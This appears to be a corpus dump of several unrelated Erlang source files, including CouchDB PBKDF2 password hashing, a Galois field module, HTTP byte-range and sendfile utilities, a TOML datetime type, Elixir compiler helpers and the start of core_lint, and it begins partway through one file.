#state{mfa_in_progress = {Module, _, _},
label_map = LabelMap}) ->
case element(Pos, Instruction) of
{f, 0} ->
%% The `0' label is an exception label in the compiler, used to
%% trigger an exception when branching. It should remain unchanged
%% here, for more information see:
%% https://github.com/erlang/otp/blob/d955dc663a6d5dd03ab3360f9dd3dc0f439c7ef5/lib/compiler/src/beam_validator.erl#L26-L32
Instruction;
{f, OldLabel} ->
NewLabel = maps:get({Module, OldLabel}, LabelMap),
setelement(Pos, Instruction, {f, NewLabel})
end.
-spec gen_module_name(Functions, State) -> Module when
Functions :: #{mfa() => #function{}},
State :: #state{},
Module :: module().
gen_module_name(Functions, #state{fun_info = Info}) ->
#{module := Module,
name := Name} = Info,
Checksum = erlang:phash2(Functions),
InternalName = lists:flatten(
io_lib:format(
"kfun__~s__~s__~b", [Module, Name, Checksum])),
list_to_atom(InternalName).
-spec gen_function_name(Module, Name, Arity, State) -> Name when
Module :: module(),
Name :: atom(),
Arity :: arity(),
State :: #state{}.
gen_function_name(
Module, Name, Arity,
#state{entrypoint = {Module, Name, Arity}}) ->
run;
gen_function_name(
Module, Name, _Arity,
_State) ->
InternalName = lists:flatten(
io_lib:format(
"~s__~s", [Module, Name])),
list_to_atom(InternalName).
%% -------------------------------------------------------------------
%% Environment handling.
%% -------------------------------------------------------------------
-spec to_standalone_env(State) -> {StandaloneEnv, State} when
State :: #state{},
StandaloneEnv :: list().
to_standalone_env(#state{fun_info = #{env := Env},
options = Options} = State) ->
State1 = State#state{options = maps:remove(
is_standalone_fun_still_needed,
Options)},
{Env1, State2} = to_standalone_arg(Env, State1),
State3 = State2#state{options = Options},
{Env1, State3}.
to_standalone_arg(List, State) when is_list(List) ->
lists:foldr(
fun(Item, {L, St}) ->
{Item1, St1} = to_standalone_arg(Item, St),
{[Item1 | L], St1}
end, {[], State}, List);
to_standalone_arg(Tuple, State) when is_tuple(Tuple) ->
List0 = tuple_to_list(Tuple),
{List1, State1} = to_standalone_arg(List0, State),
Tuple1 = list_to_tuple(List1),
{Tuple1, State1};
to_standalone_arg(Map, State) when is_map(Map) ->
maps:fold(
fun(Key, Value, {M, St}) ->
{Key1, St1} = to_standalone_arg(Key, St),
{Value1, St2} = to_standalone_arg(Value, St1),
M1 = M#{Key1 => Value1},
{M1, St2}
end, {#{}, State}, Map);
to_standalone_arg(Fun, #state{options = Options,
all_calls = AllCalls,
errors = Errors} = State)
when is_function(Fun) ->
{StandaloneFun, InnerState} = to_standalone_fun1(Fun, Options),
#state{all_calls = InnerAllCalls,
errors = InnerErrors} = InnerState,
AllCalls1 = maps:merge(AllCalls, InnerAllCalls),
Errors1 = Errors ++ InnerErrors,
State1 = State#state{all_calls = AllCalls1,
errors = Errors1},
{StandaloneFun, State1};
to_standalone_arg(Term, State) ->
{Term, State}.
to_actual_arg(#standalone_fun{arity = Arity} = StandaloneFun) ->
case Arity of
0 ->
fun() -> exec(StandaloneFun, []) end;
1 ->
fun(Arg1) -> exec(StandaloneFun, [Arg1]) end;
2 ->
fun(Arg1, Arg2) -> exec(StandaloneFun, [Arg1, Arg2]) end;
3 ->
fun(Arg1, Arg2, Arg3) ->
exec(StandaloneFun, [Arg1, Arg2, Arg3])
end;
4 ->
fun(Arg1, Arg2, Arg3, Arg4) ->
exec(StandaloneFun, [Arg1, Arg2, Arg3, Arg4])
end;
5 ->
fun(Arg1, Arg2, Arg3, Arg4, Arg5) ->
exec(StandaloneFun, [Arg1, Arg2, Arg3, Arg4, Arg5])
end;
6 ->
fun(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6) ->
exec(StandaloneFun, [Arg1, Arg2, Arg3, Arg4, Arg5, Arg6])
end;
7 ->
fun(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7) ->
exec(
StandaloneFun,
[Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7])
end;
8 ->
fun(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8) ->
exec(
StandaloneFun,
[Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8])
end;
9 ->
fun(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8, Arg9) ->
exec(
StandaloneFun,
[Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8, Arg9])
end;
10 ->
fun(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8, Arg9, Arg10) ->
exec(
StandaloneFun,
[Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8, Arg9,
Arg10])
end
end;
to_actual_arg(List) when is_list(List) ->
lists:map(
fun(Item) ->
to_actual_arg(Item)
end, List);
to_actual_arg(Tuple) when is_tuple(Tuple) ->
List0 = tuple_to_list(Tuple),
List1 = to_actual_arg(List0),
list_to_tuple(List1);
to_actual_arg(Map) when is_map(Map) ->
maps:fold(
fun(Key, Value, Acc) ->
Key1 = to_actual_arg(Key),
Value1 = to_actual_arg(Value),
Acc#{Key1 => Value1}
end, #{}, Map);
to_actual_arg(Term) ->
Term. | src/khepri_fun.erl | 0.566498 | 0.461199 | khepri_fun.erl | starcoder |
% Licensed under the Apache License, Version 2.0 (the "License"); you may not
% use this file except in compliance with the License. You may obtain a copy of
% the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
% WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
% License for the specific language governing permissions and limitations under
% the License.
-module(couch_passwords).
-export([simple/2, pbkdf2/3, pbkdf2/4, verify/2]).
-include("couch_db.hrl").
-define(MAX_DERIVED_KEY_LENGTH, (1 bsl 32 - 1)).
-define(SHA1_OUTPUT_LENGTH, 20).
%% legacy scheme, not used for new passwords.
-spec simple(binary(), binary()) -> binary().
simple(Password, Salt) ->
?l2b(couch_util:to_hex(crypto:sha(<<Password/binary, Salt/binary>>))).
%% Current scheme, much stronger.
-spec pbkdf2(binary(), binary(), integer()) -> string().
pbkdf2(Password, Salt, Iterations) ->
{ok, Result} = pbkdf2(Password, Salt, Iterations, ?SHA1_OUTPUT_LENGTH),
Result.
-spec pbkdf2(binary(), binary(), integer(), integer())
-> {ok, binary()} | {error, derived_key_too_long}.
pbkdf2(_Password, _Salt, _Iterations, DerivedLength)
when DerivedLength > ?MAX_DERIVED_KEY_LENGTH ->
{error, derived_key_too_long};
pbkdf2(Password, Salt, Iterations, DerivedLength) ->
L = ceiling(DerivedLength / ?SHA1_OUTPUT_LENGTH),
<<Bin:DerivedLength/binary,_/binary>> =
iolist_to_binary(pbkdf2(Password, Salt, Iterations, L, 1, [])),
{ok, ?l2b(couch_util:to_hex(Bin))}.
-spec pbkdf2(binary(), binary(), integer(), integer(), integer(), iolist())
-> iolist().
pbkdf2(_Password, _Salt, _Iterations, BlockCount, BlockIndex, Acc)
when BlockIndex > BlockCount ->
lists:reverse(Acc);
pbkdf2(Password, Salt, Iterations, BlockCount, BlockIndex, Acc) ->
Block = pbkdf2(Password, Salt, Iterations, BlockIndex, 1, <<>>, <<>>),
pbkdf2(Password, Salt, Iterations, BlockCount, BlockIndex + 1, [Block|Acc]).
-spec pbkdf2(binary(), binary(), integer(), integer(), integer(),
binary(), binary()) -> binary().
pbkdf2(_Password, _Salt, Iterations, _BlockIndex, Iteration, _Prev, Acc)
when Iteration > Iterations ->
Acc;
pbkdf2(Password, Salt, Iterations, BlockIndex, 1, _Prev, _Acc) ->
InitialBlock = crypto:sha_mac(Password,
<<Salt/binary,BlockIndex:32/integer>>),
pbkdf2(Password, Salt, Iterations, BlockIndex, 2,
InitialBlock, InitialBlock);
pbkdf2(Password, Salt, Iterations, BlockIndex, Iteration, Prev, Acc) ->
Next = crypto:sha_mac(Password, Prev),
pbkdf2(Password, Salt, Iterations, BlockIndex, Iteration + 1,
Next, crypto:exor(Next, Acc)).
%% verify two lists for equality without short-circuits to avoid timing attacks.
-spec verify(string(), string(), integer()) -> boolean().
verify([X|RestX], [Y|RestY], Result) ->
verify(RestX, RestY, (X bxor Y) bor Result);
verify([], [], Result) ->
Result == 0.
-spec verify(binary(), binary()) -> boolean();
(list(), list()) -> boolean().
verify(<<X/binary>>, <<Y/binary>>) ->
verify(?b2l(X), ?b2l(Y));
verify(X, Y) when is_list(X) and is_list(Y) ->
case length(X) == length(Y) of
true ->
verify(X, Y, 0);
false ->
false
end;
verify(_X, _Y) -> false.
-spec ceiling(number()) -> integer().
ceiling(X) ->
T = erlang:trunc(X),
case (X - T) of
Neg when Neg < 0 -> T;
Pos when Pos > 0 -> T + 1;
_ -> T
end. | src/couchdb/couch_passwords.erl | 0.637482 | 0.430566 | couch_passwords.erl | starcoder |
% Licensed under the Apache License, Version 2.0 (the "License"); you may not
% use this file except in compliance with the License. You may obtain a copy of
% the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
% WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
% License for the specific language governing permissions and limitations under
% the License.
-module(porkrind).
-include("porkrind_internal.hrl").
-export([
check/2,
match/2,
describe/1,
reason/2
]).
check(Value, Matcher) ->
try match(Value, Matcher) of
_ ->
ok
catch
throw:{porkrind_terminate, {FailedMatcher, Reason}} ->
{assertion_failed, [
{stack, erlang:get_stacktrace()},
{actual, Value},
{expected, describe(FailedMatcher)},
{reason, reason(FailedMatcher, Reason)}
]};
Type:Reason ->
{assertion_failed, [
{stack, erlang:get_stacktrace()},
{actual, Value},
{expected, describe(Matcher)},
{error, {Type, Reason}}
]}
end.
match(Value, Matcher) when ?IS_MATCHER(Matcher) ->
MatchFun = Matcher#'porkrind.matcher'.match,
try
MatchFun(Value)
catch throw:{porkrind_fail, Reason} ->
throw({porkrind_terminate, {Matcher, Reason}})
end.
describe(Matcher) ->
lists:flatten(describe_int(Matcher)).
describe_int(Matcher) when ?IS_MATCHER(Matcher) ->
#'porkrind.matcher'{
name = Name,
args = Args
} = Matcher,
if Args /= undefined -> ok; true ->
erlang:error({badarg, Matcher})
end,
ArgStr = string:join(lists:map(fun describe_int/1, Args), ", "),
io_lib:format("~s(~s)", [Name, ArgStr]);
describe_int(Tuple) when is_tuple(Tuple) ->
Strs = lists:map(fun describe_int/1, tuple_to_list(Tuple)),
porkrind_util:str_join(Strs, ", ", "{}");
describe_int(List) when is_list(List) ->
Strs = lists:map(fun describe_int/1, List),
porkrind_util:str_join(Strs, ", ", "[]");
describe_int(Term) ->
io_lib:format("~120p", [Term]).
reason(Matcher, Reason) when ?IS_MATCHER(Matcher) ->
ReasonFun = Matcher#'porkrind.matcher'.reason,
if ReasonFun /= undefined -> ok; true ->
erlang:error({badmatcher, Matcher})
end,
lists:flatten(ReasonFun(Reason)). | src/porkrind.erl | 0.655777 | 0.485173 | porkrind.erl | starcoder |
%% From: https://github.com/rnewson/shamir/tree/master/src/galois.erl
%% Copyright 2011 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(galois).
-export([generate/1, add/3, subtract/3, multiply/3, divide/3]).
-define(nw(W), (1 bsl W)).
-record(galois, {
w,
gflog,
gfilog
}).
generate(W) ->
generate(W, 1, 0).
generate(W, B, Log) ->
generate(W, B, Log, dict:new(), dict:new()).
generate(W, _B, Log, Gflog, Gfilog) when Log =:= ?nw(W) -1 ->
#galois{w=W, gflog=Gflog, gfilog=Gfilog};
generate(W, B, Log, Gflog, Gfilog) ->
Gflog1 = dict:store(B, Log, Gflog),
Gfilog1 = dict:store(Log, B, Gfilog),
B1 = B bsl 1,
B2 = if
B1 band ?nw(W) > 0 ->
B1 bxor prim_poly(W);
true ->
B1
end,
generate(W, B2, Log + 1, Gflog1, Gfilog1).
multiply(#galois{}, 0, _) ->
0;
multiply(#galois{}, _, 0) ->
0;
multiply(#galois{w=W, gflog=Gflog, gfilog=Gfilog}, A, B) ->
case dict:fetch(A, Gflog) + dict:fetch(B, Gflog) of
SumLog when SumLog >= ?nw(W) - 1 ->
dict:fetch(SumLog - (?nw(W) - 1), Gfilog);
SumLog ->
dict:fetch(SumLog, Gfilog)
end.
divide(#galois{}, 0, _) ->
0;
divide(#galois{}, _, 0) ->
throw(division_by_zero);
divide(#galois{w=W, gflog=Gflog, gfilog=Gfilog}, A, B) ->
case dict:fetch(A, Gflog) - dict:fetch(B, Gflog) of
DiffLog when DiffLog < 0 ->
dict:fetch(DiffLog + (?nw(W) - 1), Gfilog);
DiffLog ->
dict:fetch(DiffLog, Gfilog)
end.
add(#galois{}, A, B) ->
A bxor B.
subtract(#galois{}, A, B) ->
A bxor B.
prim_poly(4) ->
8#23;
prim_poly(8) ->
8#435;
prim_poly(16) ->
8#210013. | examples/crypto/galois.erl | 0.631822 | 0.486088 | galois.erl | starcoder |
-module(elixir_tree_helpers).
-export([abstract_syntax/1, build_bin/4, build_simple_bin/2, build_list/4, build_list/5,
build_method_call/4, build_simple_list/2,
build_var_name/2, convert_to_boolean/3]).
-include("elixir.hrl").
abstract_syntax(Tree) ->
erl_syntax:revert(erl_syntax:abstract(Tree)).
% Build a list transforming each expression and accumulating
% vars in one pass. It uses tail-recursive form.
%
% It receives a function to transform each expression given
% in Exprs, a Line used to build the List and the variables
% scope V is passed down item by item.
%
% The function needs to return a tuple where the first element
% is an erlang abstract form and the second is the new variables
% list.
build_list(Fun, Exprs, Line, S) ->
build_list(Fun, Exprs, Line, S, {nil, Line}).
build_list(Fun, Exprs, Line, S, Tail) ->
build_list_each(Fun, lists:reverse(Exprs), Line, S, Tail).
build_list_each(Fun, [], Line, S, Acc) ->
{ Acc, S };
build_list_each(Fun, [H|T], Line, S, Acc) ->
{ Expr, NS } = Fun(H, S),
build_list_each(Fun, T, Line, NS, { cons, Line, Expr, Acc }).
% Builds a simple list, without transformation, just by generating the cons-cell.
build_simple_list(Line, Args) ->
{ List, [] } = build_list(fun(X,Y) -> {X,Y} end, Args, Line, []),
List.
% Build a complex binary
build_bin(Fun, Exprs, Line, S) ->
build_bin_each(Fun, Exprs, Line, S, []).
build_bin_each(Fun, [], Line, S, Acc) ->
{ { bin, Line, lists:reverse(Acc) }, S };
build_bin_each(Fun, [H|T], Line, S, Acc) ->
{ Expr, NS, Format } = Fun(H, S),
case Expr of
{string, _, String} ->
Final = lists:foldl(fun(Integer, FinalAcc) ->
[{bin_element,Line,{integer,Line,Integer},default,Format}|FinalAcc]
end, Acc, String),
build_bin_each(Fun, T, Line, NS, Final);
_ ->
build_bin_each(Fun, T, Line, NS, [{ bin_element, Line, Expr, default, Format }|Acc])
end.
% Build simple binaries
build_simple_bin(Line, Exprs) ->
{ Bin, [] } = build_bin(fun(X,Y) -> {X,Y,default} end, Exprs, Line, []),
Bin.
build_method_call(Name, Line, Args, Expr) ->
FArgs = build_simple_list(Line, Args),
?ELIXIR_WRAP_CALL(Line, elixir_dispatch, dispatch, [Expr, {atom, Line, Name}, FArgs]).
% Builds a variable name.
build_var_name(Line, #elixir_scope{counter=Counter} = S) ->
NS = S#elixir_scope{counter=Counter+1},
Var = { var, Line, ?ELIXIR_ATOM_CONCAT(["X", Counter]) },
{ Var, NS }.
% Convert the given expression to a boolean value: true or false.
% Assumes the given expressions was already transformed.
convert_to_boolean(Line, Expr, Bool) ->
Any = [{var, Line, '_'}],
False = [{atom,Line,false}],
Nil = [{atom,Line,nil}],
FalseResult = [{atom,Line,not Bool}],
TrueResult = [{atom,Line,Bool}],
{ 'case', Line, Expr, [
{ clause, Line, False, [], FalseResult },
{ clause, Line, Nil, [], FalseResult },
{ clause, Line, Any, [], TrueResult }
] }. | src/elixir_tree_helpers.erl | 0.537527 | 0.410284 | elixir_tree_helpers.erl | starcoder |
-module(wsUtil).
-include("wsCom.hrl").
-include_lib("kernel/include/file.hrl").
-export([
gLV/3
, mergeOpts/2
, normalizeRange/2
, encodeRange/2
, fileSize/1
, sendfile/5
]).
-export_type([range/0]).
gLV(Key, List, Default) ->
case lists:keyfind(Key, 1, List) of
false ->
Default;
{Key, Value} ->
Value
end.
-spec mergeOpts(Defaults :: list(), Options :: list()) -> list().
mergeOpts(Defaults, Options) ->
lists:foldl(
fun({Opt, Val}, Acc) ->
lists:keystore(Opt, 1, Acc, {Opt, Val});
(Opt, Acc) ->
lists:usort([Opt | Acc])
end,
Defaults, Options).
-type range() :: {Offset :: non_neg_integer(), Length :: non_neg_integer()}.
-spec normalizeRange(RangeOrSet, Size) -> Normalized when
RangeOrSet :: any(),
Size :: integer(),
Normalized :: range() | undefined | invalid_range.
%% @doc: If a valid byte-range, or byte-range-set of size 1
%% is supplied, returns a normalized range in the format
%% {Offset, Length}. Returns undefined when an empty byte-range-set
%% is supplied and the atom `invalid_range' in all other cases.
normalizeRange({suffix, Length}, Size) when is_integer(Length), Length > 0 ->
Length0 = erlang:min(Length, Size),
{Size - Length0, Length0};
normalizeRange({offset, Offset}, Size) when is_integer(Offset), Offset >= 0, Offset < Size ->
{Offset, Size - Offset};
normalizeRange({bytes, First, Last}, Size) when is_integer(First), is_integer(Last), First =< Last ->
normalizeRange({First, Last - First + 1}, Size);
normalizeRange({Offset, Length}, Size) when is_integer(Offset), is_integer(Length),
Offset >= 0, Length >= 0, Offset < Size ->
Length0 = erlang:min(Length, Size - Offset),
{Offset, Length0};
normalizeRange([ByteRange], Size) ->
normalizeRange(ByteRange, Size);
normalizeRange([], _Size) -> undefined;
normalizeRange(_, _Size) -> invalid_range.
-spec encodeRange(Range :: range() | invalid_range, Size :: non_neg_integer()) -> ByteRange :: iolist().
%% @doc: Encode Range to a Content-Range value.
encodeRange(Range, Size) ->
[<<"bytes ">>, encodeRangeBytes(Range), <<"/">>, integer_to_binary(Size)].
encodeRangeBytes({Offset, Length}) ->
[integer_to_binary(Offset), <<"-">>, integer_to_binary(Offset + Length - 1)];
encodeRangeBytes(invalid_range) -> <<"*">>.
-spec fileSize(Filename :: file:name_all()) -> Size :: non_neg_integer() | {error, Reason :: file:posix() | badarg | invalid_file}.
%% @doc: Get the size in bytes of the file.
fileSize(Filename) ->
case file:read_file_info(Filename) of
{ok, #file_info{type = regular, access = Perm, size = Size}} when Perm =:= read orelse Perm =:= read_write ->
Size;
{error, Reason} -> {error, Reason};
_ -> {error, invalid_file}
end.
%% @doc Send part of a file on a socket.
%%
%% Basically, @see file:sendfile/5 but for ssl (i.e. not raw OS sockets).
%% Originally from https://github.com/ninenines/ranch/pull/41/files
%%
%% @end
-spec sendfile(file:fd(), inet:socket() | ssl:sslsocket(), non_neg_integer(), non_neg_integer(), sendfile_opts()) -> {ok, non_neg_integer()} | {error, atom()}.
sendfile(RawFile, Socket, Offset, Bytes, Opts) ->
ChunkSize = chunkSize(Opts),
Initial2 =
case file:position(RawFile, {cur, 0}) of
{ok, Offset} ->
Offset;
{ok, Initial} ->
{ok, _} = file:position(RawFile, {bof, Offset}),
Initial
end,
case sendfileLoop(Socket, RawFile, Bytes, 0, ChunkSize) of
{ok, _Sent} = Result ->
{ok, _} = file:position(RawFile, {bof, Initial2}),
Result;
{error, _Reason} = Error ->
Error
end.
-spec chunkSize(sendfile_opts()) -> pos_integer().
chunkSize(Opts) ->
case lists:keyfind(chunk_size, 1, Opts) of
{chunk_size, ChunkSize}
when is_integer(ChunkSize) andalso ChunkSize > 0 ->
ChunkSize;
{chunk_size, 0} ->
16#1FFF;
false ->
16#1FFF
end.
-spec sendfileLoop(inet:socket() | ssl:sslsocket(), file:fd(), non_neg_integer(), non_neg_integer(), pos_integer()) -> {ok, non_neg_integer()} | {error, term()}.
sendfileLoop(_Socket, _RawFile, Sent, Sent, _ChunkSize) when Sent =/= 0 ->
%% All requested data has been read and sent, return number of bytes sent.
{ok, Sent};
sendfileLoop(Socket, RawFile, Bytes, Sent, ChunkSize) ->
ReadSize = read_size(Bytes, Sent, ChunkSize),
case file:read(RawFile, ReadSize) of
{ok, IoData} ->
case ssl:send(Socket, IoData) of
ok ->
Sent2 = iolist_size(IoData) + Sent,
sendfileLoop(Socket, RawFile, Bytes, Sent2, ChunkSize);
{error, _Reason} = Error ->
Error
end;
eof ->
{ok, Sent};
{error, _Reason} = Error ->
Error
end.
-spec read_size(non_neg_integer(), non_neg_integer(), non_neg_integer()) -> non_neg_integer().
read_size(0, _Sent, ChunkSize) ->
ChunkSize;
read_size(Bytes, Sent, ChunkSize) ->
min(Bytes - Sent, ChunkSize). | src/wsSrv/wsUtil.erl | 0.606964 | 0.438966 | wsUtil.erl | starcoder |
-module(tomerl_datetime).
-ignore_xref([
format/1,
millisecond/1,
offset/1,
to_calendar/1,
type/1
]).
-export([
new_time/3,
new_time/4,
new_date/3,
new_datetime/2,
with_offset/2,
to_calendar/1,
millisecond/1,
offset/1,
type/1,
format/1
]).
-type year() :: 1000..9999.
-type month() :: 1..12.
-type day() :: 1..31.
-type hour() :: 0..23.
-type minute() :: 0..59.
-type second() :: 0..60.
-type millisecond() :: 0..999.
-type offset() :: z | integer().
% Timezone offset in minutes or `z'
-record(date, {
year :: year(),
month :: month(),
day :: day()
}).
-record(time, {
hour :: hour(),
minute :: minute(),
second :: second()
}).
-record(time_ms, {
hour :: hour(),
minute :: minute(),
second :: second(),
millisecond :: millisecond()
}).
-record(datetime, {
date :: date(),
time :: time()
}).
-record(datetime_offset, {
date :: date(),
time :: time(),
offset :: offset()
}).
-opaque date() :: #date{}.
-opaque time() :: #time{} | #time_ms{}.
-opaque datetime() :: #datetime{}.
-opaque datetime_offset() :: #datetime_offset{}.
-type t() :: date() | time() | datetime() | datetime_offset().
-export_type([
date/0,
time/0,
datetime/0,
datetime_offset/0,
year/0,
month/0,
day/0,
hour/0,
minute/0,
second/0,
millisecond/0,
offset/0,
t/0
]).
-spec new_time(hour(), minute(), second()) -> time().
new_time(H, M, S) ->
#time{hour = H, minute = M, second = S}.
-spec new_time(hour(), minute(), second(), millisecond()) -> time().
new_time(H, M, S, Ms) ->
#time_ms{hour = H, minute = M, second = S, millisecond = Ms}.
-spec new_date(year(), month(), day()) -> date().
new_date(Y, M, D) ->
#date{year = Y, month = M, day = D}.
-spec new_datetime(date(), time()) -> datetime().
new_datetime(Date, Time) ->
#datetime{date = Date, time = Time}.
-spec new_datetime(date(), time(), offset()) -> datetime_offset().
new_datetime(Date, Time, Offset) ->
#datetime_offset{date = Date, time = Time, offset = Offset}.
-spec with_offset(datetime(), offset()) -> datetime_offset().
with_offset(#datetime{date = Date, time = Time}, Offset) ->
new_datetime(Date, Time, Offset).
-spec type(_) -> time | date | datetime | datetime_offset | undefined.
type(#time{}) ->
time;
type(#time_ms{}) ->
time;
type(#date{}) ->
date;
type(#datetime{}) ->
datetime;
type(#datetime_offset{}) ->
datetime_offset;
type(_) ->
undefined.
%% @doc Convert a tomerl date, time, or datetime object to the format used by
%% Erlang's calendar module, dropping the timezone offset and millisecond
%% information
-spec to_calendar
(time()) -> calendar:time();
(date()) -> calendar:date();
(datetime()) -> calendar:datetime();
(datetime_offset()) -> calendar:datetime().
to_calendar(#time{hour = H, minute = M, second = S}) ->
{H, M, S};
to_calendar(#time_ms{hour = H, minute = M, second = S}) ->
{H, M, S};
to_calendar(#date{year = Y, month = M, day = D}) ->
{Y, M, D};
to_calendar(#datetime{date = Date, time = Time}) ->
{to_calendar(Date), to_calendar(Time)};
to_calendar(#datetime_offset{date = Date, time = Time}) ->
{to_calendar(Date), to_calendar(Time)}.
%% @doc Get the timezone offset of a datetime
-spec offset
(datetime_offset()) -> offset();
(datetime()) -> undefined.
offset(#datetime_offset{offset = Offset}) ->
Offset;
offset(#datetime{}) ->
undefined.
%% @doc Get the millisecond information of an object
-spec millisecond(datetime() | datetime_offset() | time()) -> millisecond().
millisecond(#datetime{time = Time}) ->
millisecond(Time);
millisecond(#datetime_offset{time = Time}) ->
millisecond(Time);
millisecond(#time{}) ->
0;
millisecond(#time_ms{millisecond = Ms}) ->
Ms.
%% @doc Format the date, time, or datetime in ISO8601 format
-spec format(T :: t()) -> iolist().
format(#time{hour = H, minute = M, second = S}) ->
io_lib:format("~2..0B:~2..0B:~2..0B", [H, M, S]);
format(#time_ms{hour = H, minute = M, second = S, millisecond = Ms}) ->
io_lib:format("~2..0B:~2..0B:~2..0B.~3..0B", [H, M, S, Ms]);
format(#date{year = Y, month = M, day = D}) ->
io_lib:format("~4..0B-~2..0B-~2..0B", [Y, M, D]);
format(#datetime{date = Date, time = Time}) ->
[format(Date), $T, format(Time)];
format(#datetime_offset{date = Date, time = Time, offset = z}) ->
[format(Date), $T, format(Time), $Z];
format(#datetime_offset{date = Date, time = Time, offset = Offset}) ->
Sign =
if
Offset < 0 -> $-;
true -> $+
end,
Offset1 = abs(Offset),
Minutes = Offset1 rem 60,
Hours = Offset1 div 60,
Formatted = io_lib:format("~2..0B:~2..0B", [Hours, Minutes]),
[format(Date), $T, format(Time), Sign, Formatted]. | src/tomerl_datetime.erl | 0.652352 | 0.424531 | tomerl_datetime.erl | starcoder |
%%
%% %CopyrightBegin%
%%
%% Copyright Ericsson AB 1999-2018. All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% %CopyrightEnd%
%%
%% Purpose : Do necessary checking of Core Erlang code.
%% Check Core module for errors. Seeing this module is used in the
%% compiler after optimisations we do more checking than would be
%% necessary after just parsing. Don't check all constructs.
%%
%% We check the following:
%%
%% All referred functions, called and exported, are defined.
%% Format of export list.
%% Format of attributes
%% Used variables are defined.
%% Variables in let and funs.
%% Patterns case clauses.
%% Values only as multiple values/variables/patterns.
%% Return same number of values as requested
%% Correct number of arguments
%% Consistency of values/variables
%% Consistency of function return values/calls.
%%
%% We keep the names defined variables and functions in a ordered list
%% of variable names and function name/arity pairs.
-module(core_lint).
-export([module/1,module/2,format_error/1]).
-import(lists, [reverse/1,all/2,foldl/3]).
-import(ordsets, [add_element/2,is_element/2,union/2]).
-include("core_parse.hrl").
%%-----------------------------------------------------------------------
%% Types used in this module
-type fa() :: {atom(), arity()}.
-type err_desc() :: 'invalid_attributes' | 'invalid_exports'
| {'arg_mismatch', fa()}
| {'illegal_expr', fa()} | {'illegal_guard', fa()}
| {'illegal_try', fa()}
| {'not_bs_pattern', fa()} | {'not_pattern', fa()}
| {'not_var', fa()} | {'pattern_mismatch', fa()}
| {'return_mismatch', fa()} | {'undefined_function', fa()}
| {'duplicate_var', cerl:var_name(), fa()}
| {'unbound_var', cerl:var_name(), fa()}
| {'undefined_function', fa(), fa()}
| {'tail_segment_not_at_end', fa()}.
-type error() :: {'none', module(), err_desc()}.
-type warning() :: {module(), term()}.
%%-----------------------------------------------------------------------
%% Define the lint state record.
-record(lint, {module :: module(), % Current module
func :: fa() | 'undefined', % Current function
errors = [] :: [error()], % Errors
warnings= [] :: [warning()]}). % Warnings
%%----------------------------------------------------------------------
%% format_error(Error)
%% Return a string describing the error.
-spec format_error(err_desc()) -> [char() | list()].
format_error(invalid_attributes) -> "invalid attributes";
format_error(invalid_exports) -> "invalid exports";
format_error({arg_mismatch,{F,A}}) ->
io_lib:format("argument count mismatch in ~w/~w", [F,A]);
format_error({illegal_expr,{F,A}}) ->
io_lib:format("illegal expression in ~w/~w", [F,A]);
format_error({illegal_guard,{F,A}}) ->
io_lib:format("illegal guard expression in ~w/~w", [F,A]);
format_error({illegal_try,{F,A}}) ->
io_lib:format("illegal try expression in ~w/~w", [F,A]);
format_error({not_bs_pattern,{F,A}}) ->
io_lib:format("expecting bit syntax pattern in ~w/~w", [F,A]);
format_error({not_pattern,{F,A}}) ->
io_lib:format("expecting pattern in ~w/~w", [F,A]);
format_error({not_var,{F,A}}) ->
io_lib:format("expecting variable in ~w/~w", [F,A]);
format_error({pattern_mismatch,{F,A}}) ->
io_lib:format("pattern count mismatch in ~w/~w", [F,A]);
format_error({return_mismatch,{F,A}}) ->
io_lib:format("return count mismatch in ~w/~w", [F,A]);
format_error({undefined_function,{F,A}}) ->
io_lib:format("function ~w/~w undefined", [F,A]);
format_error({duplicate_var,N,{F,A}}) ->
io_lib:format("duplicate variable ~p in ~w/~w", [N,F,A]);
format_error({unbound_var,N,{F,A}}) ->
io_lib:format("unbound variable ~p in ~w/~w", [N,F,A]);
format_error({undefined_function,{F1,A1},{F2,A2}}) ->
io_lib:format("undefined function ~w/~w in ~w/~w", [F1,A1,F2,A2]);
format_error({tail_segment_not_at_end,{F,A}}) ->
io_lib:format("binary tail segment not at end in ~w/~w", [F,A]).
-type ret() :: {'ok', [{module(), [warning(),...]}]}
| {'error', [{module(), [error(),...]}],
[{module(), [warning(),...]}]}.
-spec module(cerl:c_module()) -> ret().
module(M) -> module(M, []).
-spec module(cerl:c_module(), [compile:option()]) -> ret().
module(#c_module{name=M,exports=Es,attrs=As,defs=Ds}, _Opts) ->
Defined = defined_funcs(Ds),
St0 = #lint{module=M#c_literal.val},
St1 = check_exports(Es, St0),
St2 = check_attrs(As, St1),
St3 = module_defs(Ds, Defined, St2),
St4 = check_state(Es, Defined, St3),
return_status(St4).
%% defined_funcs([FuncDef]) -> [Fname].
